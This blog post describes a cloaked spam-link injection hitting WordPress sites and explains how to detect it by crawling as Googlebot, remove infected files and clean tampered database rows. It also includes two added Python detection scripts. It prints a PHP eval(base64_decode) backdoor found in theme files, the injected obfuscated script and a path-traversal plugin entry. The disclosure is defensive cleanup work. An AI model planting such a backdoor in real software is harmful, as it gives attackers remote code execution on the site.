
26 May 2008, by mysurface | Hits: 342393

We have been hit by a hidden spam-link injection (a modified version of the Goro spam injection). This crack injects spam links through the WordPress wp_footer() or wp_head() hooks. The spam links only reveal themselves when the page is crawled by a search-engine bot such as Googlebot; they are hidden from our eyes. We believe the cracker's purpose is to steal our search index and improve their own page rank.

These exploits are very hard to detect, because you cannot find the hidden spam links in your page source when you browse your site with a web browser. Until one day your traffic goes down exponentially and you discover the spam links showing up in the Google cache. But by then it is too late!

This is how the spam links look:

<div id="_wp_footer">..... ALL SPAM LINKS ......
<script type="text/javascript"><!--
google_ad_client = "pub-7652328300112263";
google_ad_width = 728;
google_ad_height = 15;
google_ad_format = "728x15_0ads_al_s";
google_ad_channel = "";
function google_ads(str){var idx = str.indexOf('?'); if (idx == -1) return str; var len = str.length; var new_str = ""; var i = 1; for (++idx; idx < len; id google_ads("//--> </script>

How to detect them? We can't wait until the exploit is discovered by Googlebot and ruins our Google index, so there must be a way for us to verify at any time. We use curl: change the user agent to Googlebot and crawl your own page like this:

curl --no-sessionid --user-agent "Googlebot/2.1 (+http://www.google.com/bot.html)" http://<your blog>/
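The same check scripted, as an added example that is not from the original post: fetch a page twice, once with a plain browser User-Agent and once with the Googlebot one, and report the links that appear only in the crawler's copy. The live fetch (check_site) needs network access; the two embedded sample pages are constructed, with made-up host names, shaped like the _wp_footer div shown above.

```python
import sys
import urllib.request
from html.parser import HTMLParser

GOOGLEBOT_UA = "Googlebot/2.1 (+http://www.google.com/bot.html)"
BROWSER_UA = "Mozilla/5.0"

class LinkCollector(HTMLParser):
    """Collects the href of every <a> tag in document order."""
    def __init__(self):
        super().__init__()
        self.links = []
    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self.links.extend(v for k, v in attrs if k == "href" and v)

def extract_links(html):
    parser = LinkCollector()
    parser.feed(html)
    return parser.links

def cloaked_links(browser_html, bot_html):
    """Links only the crawler is shown: the footprint of this injection."""
    visible = set(extract_links(browser_html))
    return [link for link in extract_links(bot_html) if link not in visible]

def check_site(url, timeout=15):
    """Fetch url as a browser and as Googlebot and diff the links (needs network)."""
    def fetch(ua):
        req = urllib.request.Request(url, headers={"User-Agent": ua})
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.read().decode("utf-8", "replace")
    return cloaked_links(fetch(BROWSER_UA), fetch(GOOGLEBOT_UA))

# Constructed sample: the same page as a browser sees it and as it is served
# to a Googlebot User-Agent (made-up hosts).
BROWSER_VIEW = """<html><body><p>My post</p>
<a href="http://example.org/about">About</a>
<div id="footer">Powered by WordPress</div></body></html>"""
GOOGLEBOT_VIEW = """<html><body><p>My post</p>
<a href="http://example.org/about">About</a>
<div id="_wp_footer"><a href="http://spam.example/pills">cheap pills</a>
<a href="http://spam.example/casino">casino</a></div>
<div id="footer">Powered by WordPress</div></body></html>"""

if __name__ == "__main__":
    # Pass a URL to check a live site; otherwise run on the embedded sample.
    links = check_site(sys.argv[1]) if len(sys.argv) > 1 else cloaked_links(BROWSER_VIEW, GOOGLEBOT_VIEW)
    for link in links:
        print("cloaked:", link)
```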

Thanks to Toydi, we have made some findings on how the exploit affects us. Here we tell you what we have learned from the exploit, suggest how to solve the problems, and reveal what we know about it.

How to solve this? Once you realize your site has been exploited, the first things to do are to upgrade your WordPress and remove the infected files. There is a fast way to temporarily stop the spam injection: remove the wp_footer() and wp_head() hooks from your theme. The hooks should be in footer.php and header.php.

Removing the footer and header hooks does not really clean the affected files, but the spam links will disappear if you check with curl again. This does not really solve the problem.

Where are the affected files? Affected files can be anywhere. They probably have a common name pattern, but crackers may change the name patterns any time for the next attempt. So we highly suggest you do a fresh install, unless that is too much trouble for you.

The affected files can be found under

/wp-content/uploads/
/wp-content/plugins/
/wp-content/themes/
/wp-includes/
/wp-admin/

with patterns such as *_new.php, *_old.php, *.jpgg, *.giff, *.pngg, wp-info.txt

Remove them in a batch using the find command line; you can access your ftp server with .

find . -name "*_new.php" -exec rm {} \;
find . -name "*_old.php" -exec rm {} \;
find . -name "*.jpgg" -exec rm {} \;
find . -name "*.giff" -exec rm {} \;
find . -name "*.pngg" -exec rm {} \;

In fact, infected files can be any PHP files; compare them with the original ones. Some of the images are actually not images; use the file command to verify them. We found that one of the gif files in my theme/images folder is actually encrypted PHP code. The cracker is very smart to hide it from detection!

file * | grep -v image

Check every file of your theme; we discovered injected code in our header.php and single.php:

<?php if(md5($_COOKIE['_wp_debugger'])=="2435265e6253721e9a8e200d1ebbc54e"){ eval(base64_decode($_POST['file'])); exit; } ?>

See!? The cracker decodes his PHP code with base64_decode()!!! They try to blind your eyes from detecting them.

Database exploits

We modified add_action() in plugin.php to print out all function names registered to the 'wp_footer' action hook. Then we caught a strange function name, echo123, but we couldn't find echo123 in our WordPress code or in the database. But after we connected WordPress to a new database, the spam links were gone. So it must be something wrong within the database. And our guess was right!

1. The cracker modifies the active_plugins field of the wp_options table.

a:3:{i:0;s:117:"../../../../../../../../../../../../../../../../../../../../../../tmp/tmpYwbXT2/sess_779ceef92a4fdcc17bb5ee3f13348bfd";i:1;s:46:"../../wp-content/themes/default/header_old.gif";i:2;s:27:"SK2/spam_karma_2_plugin.php";}

../../../../../../../../../../../../../../../../../../../../../../tmp/tmpYwbXT2/sess_779ceef92a4fdcc17bb5ee3f13348bfd and ../../wp-content/themes/default/header_old.gif are the exploit code; remove them accordingly.

2. If wordpress_options and internal_links_cache fields exist in your wp_options table, remove them; they are your nightmare!!!

3. Check your wp_users table and remove the 'WordPress' user.
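An added example, not from the post, that audits a wp_options dump for the database findings above: it unserializes the active_plugins array with a minimal parser for PHP's i:/s:/a: types and flags entries that cannot be legitimate plugin paths (real entries are relative to wp-content/plugins and end in .php), and it reports the wordpress_options and internal_links_cache rows. The sample rows are constructed from the value quoted in the post; the wp_users check is left out.

```python
def php_serialize_list(items):
    """Serialize a list of ASCII strings the way PHP does (used to build the sample)."""
    body = "".join('i:%d;s:%d:"%s";' % (k, len(v), v) for k, v in enumerate(items))
    return "a:%d:{%s}" % (len(items), body)

def parse_php(s, i=0):
    """Minimal PHP unserialize for i:, s: and a: values; returns (value, next_pos)."""
    t = s[i]
    if t == "i":
        j = s.index(";", i)
        return int(s[i + 2:j]), j + 1
    if t == "s":
        j = s.index(":", i + 2)
        n, start = int(s[i + 2:j]), j + 2             # skip :"
        return s[start:start + n], start + n + 2      # skip ";
    if t == "a":
        j = s.index(":", i + 2)
        count, pos, out = int(s[i + 2:j]), j + 2, {}  # skip :{
        for _ in range(count):
            k, pos = parse_php(s, pos)
            out[k], pos = parse_php(s, pos)
        return out, pos + 1                           # skip }
    raise ValueError("unsupported type %r at offset %d" % (t, i))
# Each check is a reason plus a test; a legitimate plugin path passes all of them.
CHECKS = [
    ("path traversal", lambda p: "../" in p),
    ("points at a session file", lambda p: "/tmp/" in p or "sess_" in p),
    ("not a .php file", lambda p: not p.endswith(".php")),
]
ROGUE_OPTIONS = {"wordpress_options", "internal_links_cache"}
def audit_options(rows):
    """rows: (option_name, option_value) pairs from wp_options; returns findings."""
    findings = []
    for name, value in rows:
        if name in ROGUE_OPTIONS:
            findings.append((name, ["rogue option row, remove it"]))
        elif name == "active_plugins":
            for path in parse_php(value)[0].values():
                reasons = [why for why, test in CHECKS if test(path)]
                if reasons:
                    findings.append((path, reasons))
    return findings

# Constructed copy of the post's tampered active_plugins row plus one rogue option name.
TMP_SESS = "../" * 22 + "tmp/tmpYwbXT2/sess_779ceef92a4fdcc17bb5ee3f13348bfd"
GIF_SHELL = "../../wp-content/themes/default/header_old.gif"
SAMPLE_ROWS = [
    ("active_plugins", php_serialize_list([TMP_SESS, GIF_SHELL, "SK2/spam_karma_2_plugin.php"])),
    ("internal_links_cache", "a:0:{}"),
]
```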

For the WordPress database exploit, please refer to .

It is probably more than 3 fields; if you discover extra infected fields, please let us know. Thanks in advance.

Who is behind this? Seriously, we don't know, but based on what we have, we make some guesses; feel free to give yours.

From the spam injection, we observed that the spam links are appended with a modified Google AdSense script with key pub-7652328300112263. Whose key is that? Does he steal your income as well as messing up your Google index? Only the Google AdSense team would be able to answer this.

From the spam links, they all redirect to wwwDOTyeah-oopsDOTcom and titusonenineDOTclassicalanglicanDOTnet. Are they the cracker? I tried to email them asking why they cracked my page, but of course, until today, I haven't received any reply from them.

P.S. Replace DOT with a dot. I do not want to create more keywords for them.

Okay, let us crawl their site with the user agent set to Googlebot:

curl --user-agent "Googlebot/2.1 (+http://www.google.com/bot.html)" http://<their site>/ | less

Surprisingly, their pages have been injected with spam too, but the links redirect to wwwDOTarticulateDOTcom/blog/

Crawling further, there are no more spam links injected. Heh! Who are they?

I suggest you check your blogs frequently with curl, and take fast action before they mess up your Google index again.
